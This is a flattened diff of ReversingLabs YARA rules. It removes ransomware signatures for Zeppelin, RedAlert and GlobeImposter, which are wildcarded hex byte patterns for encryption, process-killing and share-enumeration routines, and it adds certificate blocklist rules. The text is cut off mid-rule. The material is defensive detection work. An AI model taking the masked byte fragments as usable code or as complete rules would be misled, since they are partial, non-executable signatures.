"INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Zeppelin" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_files_p1 = { - 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 - 89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 45 ?? E8 ?? - ?? ?? ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 2B D8 43 53 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 42 - 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 30 FF 75 ?? 68 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 83 F8 - ?? 7C ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 - ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - C3 - } - $search_files_p2 = { - 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? - ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 - ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 - 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D - ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? - 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? - ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C3 - } - $kill_processes = { - 55 8B EC 33 C9 51 51 51 51 51 51 51 51 53 56 57 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ?? - 88 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 55 68 ?? ?? ?? ?? - 64 FF 32 64 89 22 8D 55 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B D8 8B 45 ?? 89 58 ?? 8B C3 B2 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? - C6 40 ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B F0 85 F6 - 7E ?? BB ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D - 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? 8D 55 ?? 8B 45 - ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 40 ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ?? - EB ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? - ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B1 ?? 33 - D2 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? - 8B 45 ?? 80 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5F - 5E 5B 8B E5 5D C3 - } - $enum_shares = { - 55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 53 56 57 89 45 ?? 8B 45 ?? E8 ?? ?? - ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 - 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? 33 - D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 89 45 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B - 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 48 85 - C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 55 ?? 8B 45 ?? 8B - 18 FF 53 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 33 C0 55 68 ?? ?? ?? ?? 64 - FF 30 64 89 20 FF 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? 33 D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 - ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? - 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 - 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? FF 45 ?? - FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A - 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? - ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB - ?? 5F 5E 5B 8B E5 5D C3 - } - $encrypt_files = { - 55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8B D9 88 - 55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C6 E8 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 88 5E ?? 88 5E ?? 56 6A ?? 8D 46 ?? 50 B9 ?? ?? ?? ?? 33 D2 33 C0 E8 ?? - ?? ?? ?? 8B D8 89 5E ?? 85 DB 75 ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? - 89 45 ?? C6 45 ?? ?? 8D 45 ?? 50 6A ?? 8B 0D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? - ?? C3 - } - condition: - uint16(0)==0x5A4D and ($kill_processes) and ($enum_shares) and ( all of ($search_files_p*)) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="44:63:d8:b3:1e:0f:87:c1:42:33:d4:d0:d2:c4:87:a0" and 1477612800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Linux_Ransomware_Redalert : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_387982605E542D6D52F231Ca6F5657Cc : INFO FILE { meta: - description = "Yara rule that detects RedAlert ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ec7567bf-2c39-529f-ae93-74270a161827" - date = "2022-09-01" - modified = "2022-09-01" + id = "2d5731e1-b18b-544e-ae14-40d70b679618" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Linux.Ransomware.RedAlert.yara#L1-L146" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fe0d10c2ef1dacdb5374f319e470274b91f4f171db49de8c89e8aaa9aa75a45c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14656-L14672" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d55cfd45bc0d330c0ed433a882874e4633ffbaa0d68288bea9058fe269d75ed9" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "RedAlert" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 74 24 ?? BE ?? ?? ?? ?? 48 - 89 54 24 ?? 48 89 4C 24 ?? 4C 89 44 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 75 ?? BF - ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 89 C3 75 ?? BF ?? - ?? ?? ?? E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 48 8D 54 24 ?? - 89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C0 75 ?? BF ?? ?? ?? ?? EB ?? 4C 8B B4 24 ?? - ?? ?? ?? 4D 85 F6 7F ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? EB ?? 49 - 81 FE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 97 44 24 ?? 49 81 FE ?? ?? ?? ?? 0F 97 - 44 24 ?? 80 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 4C 89 F0 C7 44 24 ?? ?? ?? ?? ?? 48 89 - D3 31 D2 48 F7 F3 48 6B C8 ?? 48 89 4C 24 ?? 49 81 FE ?? ?? ?? ?? 77 ?? 4D 89 F4 41 - BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 41 BC ?? ?? ?? ?? 45 31 ED C7 44 24 ?? - ?? ?? ?? ?? 4D 63 FD C7 44 24 ?? ?? ?? ?? ?? 4C 0F AF 7C 24 ?? E9 ?? ?? ?? ?? 80 7C - 24 ?? ?? 74 ?? 45 85 ED 74 ?? 80 7C 24 ?? ?? 74 ?? 41 8D 45 ?? 3B 44 24 ?? 4C 89 FE - 75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48 63 7C 24 ?? - 48 89 E9 4C 89 E2 48 03 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 39 E0 74 ?? BF ?? - ?? ?? ?? EB ?? 44 01 64 24 ?? 41 FF C5 44 3B 6C 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24 - ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84 C0 74 ?? BF ?? - ?? ?? ?? EB ?? 48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 85 C0 - 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 63 6C 24 ?? 45 89 E7 44 89 64 24 ?? 4C 0F AF - 6C 24 ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B 4C 24 ?? 41 B8 - ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84 - } - $encrypt_files_p2 = { - C0 75 ?? 48 8B 54 24 ?? 48 8B 7C 24 ?? 48 89 E9 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 - 15 ?? ?? ?? ?? 48 39 D0 75 ?? 48 8B 44 24 ?? 48 89 E9 BE ?? ?? ?? ?? 0F B7 50 ?? 48 - 8B 38 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F B7 51 ?? 48 39 D0 74 ?? BF ?? ?? ?? ?? E9 ?? - ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 4C 03 7C 24 ?? 44 3B 6C 24 ?? 0F 8C ?? ?? ?? ?? E9 - ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 80 7C - 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 80 7C 24 ?? ?? 74 ?? 8B 44 24 ?? 4C 89 EE FF C0 - 3B 44 24 ?? 75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48 - 63 44 24 ?? 48 8B 5C 24 ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C9 31 - D2 45 89 E1 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 01 C3 48 8D 84 24 ?? - ?? ?? ?? 49 89 D8 48 89 1C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 48 89 E9 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 39 E0 0F 85 ?? ?? ?? ?? - FF 44 24 ?? 8B 54 24 ?? 8B 4C 24 ?? 01 54 24 ?? 39 4C 24 ?? 75 ?? 31 F6 BA ?? ?? ?? - ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 E9 BA ?? ?? ?? ?? BE ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8A 5C 24 ?? 48 83 F8 ?? B0 ?? 0F 44 D8 44 3B 7C 24 ?? 88 5C 24 - ?? 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 44 03 7C 24 ?? 4C 03 6C 24 ?? 8B 44 24 ?? 39 - 44 24 ?? 0F 8C ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 0F B6 44 24 ?? 48 81 C4 ?? ?? ?? - ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3 - } - $find_files_p1 = { - 41 57 FC 41 56 41 55 41 54 49 89 FC 55 53 48 83 EC ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 - 4C 24 ?? 48 83 C9 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 88 54 24 ?? 48 89 - 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 44 8A BC 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 - ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 31 C0 F2 AE 4C 89 - E7 48 F7 D1 4C 8D 71 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 85 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 48 83 C4 ?? 4C 89 E6 48 89 C2 5B 5D 41 5C 41 5D 41 - 5E 41 5F BF ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 45 84 FF 48 8D 6B ?? 74 ?? 0F B6 4B ?? - 48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ?? - 80 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 - ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ?? - ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FC 31 C0 48 83 C9 ?? 48 89 EF - F2 AE 4C 89 F0 48 29 C8 48 3B 44 24 ?? 76 ?? 48 8B 3D ?? ?? ?? ?? 48 89 E9 4C 89 E2 - BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EE 48 8D 7B ?? - C6 03 ?? E8 ?? ?? ?? ?? 41 0F B6 C7 4C 8B 4C 24 ?? 4C 8B 44 24 ?? 89 44 24 ?? 48 8B - 44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 74 24 ?? 4C 89 E7 48 89 44 24 ?? 48 8B - } - $find_files_p2 = { - 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 04 24 E8 - ?? ?? ?? ?? E9 ?? ?? ?? ?? 45 84 FF 0F 85 ?? ?? ?? ?? FC 48 83 C9 ?? 48 89 EF 44 88 - F8 F2 AE 48 8B 54 24 ?? 48 89 EF 48 89 CB 48 8B 4C 24 ?? 48 F7 D3 48 89 DE 4C 8D 6B - ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? - E9 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? - ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EA 4C - 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8D 7B ?? 48 89 EE C6 03 ?? E8 ?? ?? ?? - ?? 0F B7 0D ?? ?? ?? ?? 4C 89 E7 4C 8B 44 24 ?? 48 8B 54 24 ?? 48 8B 74 24 ?? FF 15 - ?? ?? ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? 48 8B 7C 24 ?? B9 ?? ?? ?? ?? 4C 89 E2 BE ?? - ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8B 74 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF - ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 8D 56 ?? - 4C 89 E6 E8 ?? ?? ?? ?? C6 03 ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C3 0F - 85 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F E9 - } - $setup_environment = { - 55 48 89 E5 41 56 49 89 F6 BE ?? ?? ?? ?? 41 55 41 54 53 48 89 FB 48 83 EC ?? E8 ?? - ?? ?? ?? 48 85 C0 49 89 C4 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7D ?? E8 ?? ?? - ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49 - 89 C4 74 ?? 0F B7 55 ?? 48 8B 7D ?? 48 89 C1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55 - ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55 ?? 31 C9 39 C2 0F 85 - ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? - ?? 49 89 E5 E8 ?? ?? ?? ?? 66 8B 3D ?? ?? 22 00 66 03 3D ?? ?? 22 00 66 8B 05 ?? ?? - 22 00 66 89 7D ?? 0F B7 FF 66 89 45 ?? E8 ?? ?? ?? ?? 0F B7 7D ?? 48 89 45 ?? E8 ?? - ?? ?? ?? 0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? 48 89 45 ?? E8 ?? ?? ?? ?? - 0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 75 ?? BF ?? ?? - ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 45 ?? 0F B7 35 ?? ?? ?? ?? 31 C9 48 8B 7D ?? 48 83 - C0 ?? 25 ?? ?? ?? ?? 48 29 C4 48 8D 5C 24 ?? 48 83 E3 ?? 48 89 DA E8 ?? ?? ?? ?? 48 - 89 DE BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 48 03 - 7D ?? E8 ?? ?? ?? ?? 66 39 05 ?? ?? 22 00 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 - EC 31 C9 EB ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D 75 ?? B9 ?? ?? ?? ?? 4C 89 F7 FC F3 A5 - B1 ?? EB ?? 4C 89 EC EB ?? 48 8D 65 ?? 89 C8 5B 41 5C 41 5D 41 5E C9 C3 - } - $make_configuration = { - 41 56 BE ?? ?? ?? ?? 49 89 FE BF ?? ?? ?? ?? 41 55 41 54 55 53 48 83 EC ?? E8 ?? ?? - ?? ?? 84 C0 88 C3 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 FF EB ?? BF ?? ?? ?? ?? E8 - ?? ?? ?? ?? BA ?? ?? ?? ?? 0F B7 F0 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 - ?? ?? ?? ?? B9 ?? ?? ?? ?? 49 89 C4 48 89 C2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? 66 C7 00 - ?? ?? C6 40 ?? ?? E8 ?? ?? ?? ?? 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 - E6 4C 89 E7 E8 ?? ?? ?? ?? 84 C0 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? - E8 ?? ?? ?? ?? FC 88 D8 BF ?? ?? ?? ?? 48 83 C9 ?? F2 AE 48 F7 D1 48 FF C9 8D 59 ?? - 83 C1 ?? 48 63 F9 E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 0F 84 ?? ?? ?? ?? 48 8D 78 ?? 48 - 63 D3 BE ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ?? - 48 85 C0 48 89 C3 BF ?? ?? ?? ?? 74 ?? 0F B7 54 24 ?? 48 8B 7C 24 ?? 48 89 C1 BE ?? - ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? BF ?? ?? ?? - ?? E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 F7 48 89 E6 B9 ?? ?? ?? ?? FC F3 A5 - 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E C3 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 - } - condition: - uint32(0)==0x464C457F and ($setup_environment) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($make_configuration) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Jiang Liu" and pe.signatures[i].serial=="38:79:82:60:5e:54:2d:6d:52:f2:31:ca:6f:56:57:cc" and 1475884800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Globeimposter : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_E0134C41E7Eda6863C4Eee5B003976Dd : INFO FILE { meta: - description = "Yara rule that detects GlobeImposter ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6634a554-b4bb-503d-a4f1-9997b4caa1f0" - date = "2020-07-15" - modified = "2020-07-15" + id = "395c14fd-2fec-53ad-bc8e-2dd4bb3522d2" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.GlobeImposter.yara#L1-L171" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4345a767f270428f3b509fdad5a96bf9b494b190d3a836c4bf53dfd75da5bacb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14674-L14692" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fbe34baf52e3fa7d7cdfcfaef9b8851c4cbeb46d17eeade61750e59cf0c13291" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "GlobeImposter" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_1 = { - 81 EC ?? ?? ?? ?? 83 24 24 ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 44 24 - ?? 50 E8 ?? ?? ?? ?? 8D 04 24 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 8B 1D ?? - ?? ?? ?? 55 56 57 8B 3D ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ?? ?? - ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 50 89 74 24 ?? FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 - 74 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8 - ?? ?? ?? ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? - ?? 68 ?? ?? 